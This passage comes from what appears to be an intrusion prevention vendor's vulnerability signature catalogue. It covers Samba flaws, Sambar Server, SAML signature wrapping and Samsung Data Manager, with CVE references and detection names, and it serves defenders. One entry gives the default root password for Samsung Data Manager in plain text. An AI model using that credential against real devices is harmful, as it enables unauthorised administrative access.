Description: A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing &quot;LsarAddPrivilegesToAccount&quot; operation. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the LSA RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.
Situation: MSRPC-TCP_Samba-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-23973
http://www.securityfocus.com/bid/23973
Back to top

Samba-Mangling-Method-Buffer-Overflow

About this vulnerability: A vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: There is a vulnerability in the way Samba handles Name Mangling in its file system sharing process. A specially crafted file name could trigger a stack buffer overflow if the mangling method was set to hash. An attacker can exploit this vulnerability to execute arbitrary code with the privileges of the Samba process. Generally, Samba executes as root user and has access to system privileges.
Situation: SMB-TCP_Samba-Mangling-Method-Buffer-Overflow
References:
CVE-2004-0686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0686
Back to top

Samba-MS-RPC-Remote-Command-Execution

About this vulnerability: A Samba MS-RPC Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Input Validation
Description: A vulnerability in Samba, versions 3.0.0 through 3.0.25rc3, which allows remote users to execute arbitrary commands via a crafter USER parameter.
Situation: SMB-TCP_Samba-MS-RPC-Remote-Command-Execution
References:
CVE-2007-2447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447
BID-23972
http://www.securityfocus.com/bid/23972
OSVDB-34700
http://www.osvdb.org/34700
Back to top

Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Integer Overflow
Description: Incorrect parsing of data in the ndr_pull_dnsp_name() function causes an integer overflow vulnerability in Samba. A successfull exploitation allows an attacker to run arbitrary code on the target system.
Situation: LDAP_CS-Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow
References:
CVE-2016-2123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2123
Back to top

Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow

About this vulnerability: Samba NetBIOS Replies Stack Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Samba 3.0.0 through 3.0.26a that allows remote attackers to execute arbitrary code via a crafted WINS Name Registration request.
Situation: Generic_UDP-Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow
References:
CVE-2007-5398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398
BID-26455
http://www.securityfocus.com/bid/26455
Back to top

Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow

About this vulnerability: Buffer overflow vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in Samba. A crafed NetDfsEnum RPC request to the vulnerable Samba server allows arbitrary code execution with the privileges of the affected service process.
Situation: MSRPC-TCP_CPS-Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-24198
http://www.securityfocus.com/bid/24198
OSVDB-34699
http://www.osvdb.org/34699
Back to top

Samba-Nmbd-Sys_recvfrom-Infinite-Loop-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Infinite Loop
Description: A denial of service vulnerability exists in Samba nmbd daemon. The vulnerability is due to an error when handling crafted NetBIOS packets that causes nmbd to enter an infinite loop. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious request to the server. Successful exploitation could lead to a denial of service condition on the server.
Situation: UDP_Checksum-Mismatch
References:
CVE-2014-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0244
OSVDB-108348
http://www.osvdb.org/108348
Back to top

Samba-Nmbd-Unstrcpy-Buffer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Samba. The vulnerability is due to using incorrect buffer size in a string copy operation in the nmbd daemon. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious packets to a vulnerable nmbd service. A successful attack could result in arbitrary code execution with the privileges of the superuser while an unsuccessful attack will result in the application to terminate or stop responding.
Situation: SMB-TCP_Samba-Nmbd-Unstrcpy-Buffer-Overflow
References:
CVE-2014-3560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3560
BID-69021
http://www.securityfocus.com/bid/69021
OSVDB-109760
http://www.osvdb.org/109760
Back to top

Samba-Nttrans-Buffer-Overflow

About this vulnerability: A Samba nttrans Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A vulnerability in Samba, versions 2.2.2 - 2.2.6, which allows remote attackers to execute arbitrary code via a long encrypted password due to the lack of length checking for encrypted password change requests from clients.
Situation: SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1
References:
CVE-2002-1318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1318
BID-6210
http://www.securityfocus.com/bid/6210
OSVDB-14525
http://www.osvdb.org/14525
Back to top

Samba-Printer-Server-Spoolss-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: Improper validation of MSRPC messages causes a denial of service vulnerability in Samba.
Situation: MSRPC-TCP_CPS-Samba-Printer-Server-Spoolss-Denial-Of-Service
References:
CVE-2018-1050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1050
BID-103387
http://www.securityfocus.com/bid/103387
Back to top

Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Infinite Loop
Description: A memory exhaustion vulnerability has been reported in Samba server. The vulnerability is due to an infinite loop allocating memory that occurs when processing specially crafted packets. A remote authenticated or guest attacker could exploit this vulnerability by sending specially crafted requests to the target server. Successful exploitation of this vulnerability results in a denial of service condition.
Situation: SMB-TCP_Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service
References:
CVE-2013-4124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4124
OSVDB-95969
http://www.osvdb.org/95969
Back to top

Samba-receive_smb_raw-SMB-Packets-Parsing-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Samba. A successful exploit leads to a denial of service terminating the vulnerable application or non-privileged arbitrary code execution.
Situation: NetBIOS-TCP_Samba-receive-smb-raw-SMB-Packets-Parsing-Buffer-Overflow
References:
CVE-2008-1105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1105
BID-29404
http://www.securityfocus.com/bid/29404
OSVDB-45657
http://www.osvdb.org/45657
Back to top

Samba-Remote-Code-Execution-From-Writable-Share

About this vulnerability: A Samba Remote Code Execution From Writable Share vulnerability
Risk: High
First detected in: sgpkg-ips-914-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Insecure Configuration
Description: A remote code execution vulnerability in Samba, versions 3.5.0 and onwards, which allows remote attackers to upload a shared library to a writable share, and to load and execute it.
Situation: SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share
SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share-2
References:
CVE-2017-7494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494
Back to top

Samba-Root-File-System-Access-Security-Bypass

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-358-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: A security bypass vulnerability exists in Samba. The vulnerability is due to a design weakness when registry based share definition is enabled. A remote attacker may leverage this vulnerability to gain read-only access to the local file system in the security context of the Samba service. In the case of a successful attack, a remote attacker may gain read-only access the root directory on the target system in the security context of the Samba service.
Situation: SMB-TCP_Samba-Root-File-System-Access-Security-Bypass
References:
CVE-2009-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022
BID-33118
http://www.securityfocus.com/bid/33118
OSVDB-51152
http://www.osvdb.org/51152
Back to top

Samba-Security-Descriptor-Parsing-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in Samba security descriptor parsing
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Samba
Type: Buffer Overflow
Description: Samba is vulnerable to an integer overflow when processing MS-RPC requests. A remote authenticated attacker could send a specially-crafted message requesting multiple security descriptors, which would lead to heap corruption and execution of arbitrary commands on the system with root privileges or possibly cause a Denial of Service (DoS).
Situation: SMB-TCP_Samba-Security-Descriptor-Parsing-Integer-Overflow
References:
CVE-2004-1154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1154
BID-11973
http://www.securityfocus.com/bid/11973
OSVDB-12422
http://www.osvdb.org/12422
Back to top

Samba-Sid-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Critical
First detected in: sgpkg-ips-359-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Samba. The vulnerability is due to a boundary error when parsing the Security ID (SID) in SMB packets. Remote attackers could exploit this vulnerability by sending a crafted SMB message to a target SMB server. Successful exploitation would allow for arbitrary code injection and execution which might allow the attacker to take complete control of a target host. Code injection that does not result in execution could crash the vulnerable service, and result in a Denial of Service condition.
Situation: SMB-TCP_Samba-Sid-Parsing-Stack-Buffer-Overflow
References:
CVE-2010-3069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3069
BID-43212
http://www.securityfocus.com/bid/43212
Back to top

Samba-SMB-CIFS-Packet-Assembling-BOF

About this vulnerability: Remote buffer overflow in Samba
Risk: High
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Samba
Type: Buffer Overflow
Description: SMB daemon (smbd) in Samba before 2.2.8 is vulnerable to a buffer overflow in the SMB/CIFS packet fragment reassembly code. A remote attacker could send a specially-crafted SMB/CIFS packet to overwrite memory and possibly execute arbitrary code on the system with the root privileges.
Situation: SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1
References:
CVE-2003-0085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0085
BID-7106
http://www.securityfocus.com/bid/7106
OSVDB-6323
http://www.osvdb.org/6323
Back to top

Samba-SMB1-Information-Disclosure

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Input Validation
Description: Improper validation of write requests causes an information disclosure vulnerability in Samba. A successful exploit allows a remote attacker to leak the memory contents of the target system without authentication.
Situation: SMB-TCP_CHS-Samba-SMB1-Information-Disclosure
References:
CVE-2017-12163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12163
Back to top

Samba-SMB1-Message_Push_String-Information-Disclosure

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: Improper handling of SMB1 commands causes uninitialized memory contents to be included in the response message. A successful exploit may allow an attacker to gain access to privileged information on the target.
Situation: SMB-TCP_SHS-Samba-SMB1-Message_Push_String-Information-Disclosure
References:
CVE-2017-15275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15275
Back to top

Samba-SMB1-Packets-Chaining-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Samba
Risk: Critical
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Samba
Type: Malfunction
Description: There is a memory corruption vulnerability in Samba. A remote unauthenticated attacker can exploit this vulnerability by specifying a malicious AndXOffset in the AndX request to compromise the vulnerable system.
Situation: NetBIOS-TCP_Samba-SMB1-Packets-Chaining-Memory-Corruption
SMB-TCP_CHS-Samba-SMB1-Packets-Chaining-Memory-Corruption
References:
CVE-2010-2063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2063
BID-40884
http://www.securityfocus.com/bid/40884
OSVDB-65518
http://www.osvdb.org/65518
Back to top

Samba-SMB1-Smb_request_done-Use-After-Free

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: A use after free vulnerability in SMB1 component of Samba could allow a remote, authenticated attacker to run arbitrary code execution in the security context of the Samba service.
Situation: SMB-TCP_CS-Samba-SMB1-Smb_request_done-Use-After-Free
References:
CVE-2017-14746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14746
Back to top

Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: There exists an information disclosure vulnerability in Samba. A remote, authenticated attacker could use this to gain sensitive information.
Situation: SMB-TCP_Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure
References:
CVE-2015-5252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5252
Back to top

Samba-smbd-Flags2-Header-Parsing-DOS

About this vulnerability: A null pointer dereference vulnerability in Samba
Risk: Critical
First detected in: sgpkg-ips-308-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Malfunction
Description: There is a null pointer dereference vulnerability in Samba. An unauthenticated remote attacker can exploit this vulnerability by creating a mismatch by changing the FLAGS2 field between the Session Setup AndX request and associated Negotiate Protocol request to cause a process panic, leading to a denial of service condition.
Situation: SMB-TCP_CHS-Samba-smbd-Flags2-Header-Parsing-DOS
References:
BID-40097
http://www.securityfocus.com/bid/40097
Back to top

Samba-smbd-Packets-Chaining-AndX-Offset-Infinite-Loop

About this vulnerability: A vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Infinite Loop
Description: There is an infinite loop vulnerability in Samba. The vulnerability is due to insufficient validation of AndX request offsets, which should be increasing in a strictly monotonic manner. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious AndX request to the target. Successful exploitation of this vulnerability could result in the execution of arbitrary code in the context of the affected service.
Situation: SMB-TCP_Samba-smdb-Packets-Chaining-AndX-Offset-Infinite-Loop
References:
CVE-2012-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870
BID-52103
http://www.securityfocus.com/bid/52103
OSVDB-79443
http://www.osvdb.org/79443
Back to top

Samba-smbd-Serverpasswordset-RPC-Memory-Corruption

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Malfunction
Description: A memory corruption vulnerability exists in the Samba smbd daemon. The vulnerability is due to the way _netr_ServerPasswordSet() in Samba handles ServerPasswordSet RPC requests. As it processes crafted NetLogon packets, it attempts to free an uninitialized pointer using TALLOC_FREE(). A remote, unauthenticated attacker could exploit this vulnerability by sending malicious NetLogon RPC messages to the target server. Successful exploitation could lead to arbitrary code execution with the root privileges.
Situation: MSRPC-TCP_CPS-Samba-smbd-Serverpasswordset-RPC-Memory-Corruption
References:
CVE-2015-0240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240
BID-72711
http://www.securityfocus.com/bid/72711
OSVDB-118637
http://www.osvdb.org/118637
Back to top

Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS

About this vulnerability: A denial of service vulnerability in Samba
Risk: Critical
First detected in: sgpkg-ips-308-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Malfunction
Description: There is a denial of service vulnerability in Samba. An unauthenticated remote attacker can send an SMB Session Setup AndX request with an overly large SecurityBlobLength to cause a process panic, leading to a denial of service condition.
Situation: SMB-TCP_CHS-Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS
References:
BID-40097
http://www.securityfocus.com/bid/40097
Back to top

Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Critical
First detected in: sgpkg-ips-361-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the SPOOLSS RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.
Situation: MSRPC-TCP_CPS-Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-BOF
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-24197
http://www.securityfocus.com/bid/24197
Back to top

Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service

About this vulnerability: A vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: Samba
Type: Infinite Loop
Description: An infinite loop vulnerability has been reported for Samba. This vulnerability is due to improper validation RPC data in the mdssvc service. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted mdssvc RPC request to the target server. Successfully exploiting this vulnerability could result in denial of service conditions.
Situation: SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service
References:
CVE-2023-34966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34966
Back to top

Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service

About this vulnerability: A vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Generic
Software: Samba
Type: Input Validation
Description: A denial of service vulnerability has been reported in samba. This vulnerability is due to improper validation of value types before use, causing type confusion. A remote unauthenticated attacker could exploit these vulnerabilities by sending maliciously crafted data to the target server. Successful exploitation of this vulnerability could lead to denial of service.
Situation: SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service
References:
CVE-2023-34967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34967
Back to top

Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote unauthenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the SRVSVC RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the Samba user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will terminate.
Situation: MSRPC-TCP_Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
Back to top

Samba-Swat-HTTP-Authentication-Buffer-Overflow

About this vulnerability: A Samba Swat HTTP Authentication Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the Samba SWAT web based administration tool which allows remote attackers to create a denial of service condition or execute arbitrary code by sending a specially crafted authentication string.
Situation: HTTP_CSH-Samba-Swat-HTTP-Authentication-Buffer-Overflow
References:
CVE-2004-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0600
Back to top

Samba-Trans2open-BOF

About this vulnerability: Samba trans2open function buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the samba server. This vulnerability can be remotely exploited, and if exploited successfully, it grants the attacker a remote root access.
Situation: SMB-TCP_CHS-Samba-Trans2open-BOF-1
References:
CVE-2003-0201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0201
BID-7294
http://www.securityfocus.com/bid/7294
Back to top

Samba-Unauthorized-Read-Access-Via-Authentication-Bypass

About this vulnerability: Authentication bypass vulnerability allows remote read access
Risk: High
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Samba
Type: Malfunction
Description: A security bypass vulnerability exists in Samba. The vulnerability is due to a design weakness when registry based share definition is enabled. A remote attacker may leverage this vulnerability to gain read-only access to the local file system in the security context of the Samba service.
Situation: SMB-TCP_Samba-Authentication-Bypass
References:
CVE-2009-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022
BID-33118
http://www.securityfocus.com/bid/33118
OSVDB-51152
http://www.osvdb.org/51152
Back to top

Samba-Unicode-Filename-Buffer-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A vulnerability has been reported in the way Samba handles file information requests. A malformed request can trick the server into overflowing an incorrectly allocated buffer while generating a response. If certain conditions are met, an attacker can exploit this vulnerability to execute malicious code on the vulnerable server with the privileges of the the session user account. In a simple attack exploiting this vulnerability, the target Samba server will terminate the child process serving the attacker, closing the connection as a result. The parent Samba process spawns multiple child processes to serve requests. Each child process serves one client. Therefore, a simple attack will only affect the process dedicated to serving the attacker. In the case of a more sophisticated attack, arbitrary code is executed with the privileges of the child process. The behaviour of the target system will be dependent on the malicious code.
Situation: SMB-TCP_Samba-Unicode-Filename-Buffer-Overflow
References:
CVE-2004-0882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0882
BID-11678
http://www.securityfocus.com/bid/11678
OSVDB-11782
http://www.osvdb.org/11782
Back to top

Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Samba
Type: Input Validation
Description: Improper parsing of the EA metadata by the vfs_fruit module causes a out of bounds read and write vulnerability while opening files in smbd. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: SMB-TCP_CHS-Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write
References:
CVE-2021-44142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44142
Back to top

Samba-Wild-Card-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Samba
Risk: Low
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Samba
Type: Malfunction
Description: Samba SMB/CIFS server is vulnerable to a denial-of-service (DoS) attack, caused by a vulnerability in the ms_fnmatch function. By sending multiple specially-crafted commands to the vulnerable server, a remotely-authenticated attacker could consume 100% of the available CPU resources.
Situation: SMB-TCP_CHS-Samba-Wild-Card-DoS
References:
CVE-2004-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0930
BID-11624
http://www.securityfocus.com/bid/11624
OSVDB-11555
http://www.osvdb.org/11555
Back to top

Sambar-Cgitest

About this vulnerability: Sambar Server cgitest.exe input size validation failure
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Sambar Server
Type: Buffer Overflow
Description: Sambar Server contains the cgitest.exe sample program that validates the input length incorrectly. This may lead to a buffer overflow that could cause a system compromise.
References:
CVE-2002-0128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0128
BID-3885
http://www.securityfocus.com/bid/3885
Back to top

Sambar-Server-Search-Results-Buffer-Overflow

About this vulnerability: A Sambar Server Search Results Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sambar Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Sambar Server, versions before 6.0, which allows remote attackers to execute arbitrary code via an HTTP POST request with a long query parameter.
Situation: HTTP_CRL-Sambar-Server-Search-Results-Buffer-Overflow
References:
CVE-2004-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2086
BID-9607
http://www.securityfocus.com/bid/9607
OSVDB-5786
http://www.osvdb.org/5786
Back to top

Sambar-Server-Search-Script-BOF

About this vulnerability: Buffer overflow in Sambar Server search script
Risk: Moderate
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sambar Server
Type: Buffer Overflow
Description: Sambar Server is vulnerable to a denial of service attack, because of a buffer overflow in its search script. By sending a specially-crafted query in post mode to the vulnerable server, a remote attacker could overflow a buffer and cause the server to crash or execute arbitrary code on the server.
Situation: HTTP_CS-Sambar-Server-Search-Script-DoS
References:
BID-7975
http://www.securityfocus.com/bid/7975
OSVDB-2204
http://www.osvdb.org/2204
Back to top

Saml-XML-Signature-Wrapping

About this vulnerability: An attempt to exploit a vulnerability in SAML authentication detected
Risk: High
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: Security Assertion Markup Language (SAML) with XML signatures is a critical component of federated identity deployments and single sign-on. This fingerprint detects main variants of the XML signature wrapping vulnerabilities, which could be exploited to bypass authentication or escalate privileges.
Situation: HTTP_CRL-Saml-XML-Signature-Wrapping
Back to top

Samsung-Data-Manager-Default-Root-Password

About this vulnerability: A vulnerability in Samsung Data Manager
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung Data Manager
Type: Malfunction
Description: Samsung Data manager uses a well-known default password (rkwjsdusrnth) for root account which allows remote attackers to gain administrative privileges in Samsung Data Manager web service.
Situation: FTP_CS-Samsung-Data-Manager-Default-Root-Password
Telnet_CS-Samsung-Data-Manager-Default-Root-Password
Back to top

Samsung-Data-Manager-Hardcoded-Credentials

About this vulnerability: A vulnerability in Samsung Data Manager
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung Data Manager
Type: Malfunction
Description: Samsung Data Manager uses hardcoded credentials which allows remote attackers to gain administrative privileges in Samsung Data Manager web service.
Situation: HTTP_CRL-Samsung-Data-Manager-Hardcoded-Credentials
Back to top

Samsung-Data-Manager-SQL-Injection

About this vulnerability: A vulnerability in Samsung Data Manager
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung Data Manager
Type: SQL Injection
Description: There is an SQL injection vulnerability in the authentication form of Samsung Data Manager which allos remote attacker to execute arbitrary SQL commands.
Situation: HTTP_CRL-Samsung-Data-Manager-SQL-Injection
References:
CVE-2010-4284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4284
Back to top

Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow

